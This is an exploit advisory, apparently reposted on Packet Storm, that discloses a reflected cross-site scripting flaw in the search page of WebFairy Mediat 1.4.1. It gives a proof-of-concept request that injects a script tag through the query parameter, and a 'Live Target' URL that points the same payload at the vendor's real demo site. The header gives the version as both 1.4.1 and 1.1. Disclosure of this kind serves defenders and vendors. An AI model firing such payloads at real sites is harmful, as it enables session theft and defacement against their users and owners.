WebFairy Mediat version 1.4.1 suffers from a cross site scripting vulnerability.
9fca0c0fd8c9658c04186ac9ada96d927957a5dc818959375048a66fe140e030# Exploit Title: Mediat 1.4.1 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://webfairy.net/
# Software Link: https://github.com/WebFairyNet/Mediat
# Demo Website: http://mediat.webfairy.net/
# Version: 1.1
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
A XSS found in "WebFairy Mediat 1.4.1" search section.
# POC Request:
http://[PATH]/search.html?query="><script>alert('Deyaa')</script>
#Live Target:
http://mediat.webfairy.net/arabic_demo/search.html?query="><script>alert('Deyaa')</script>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed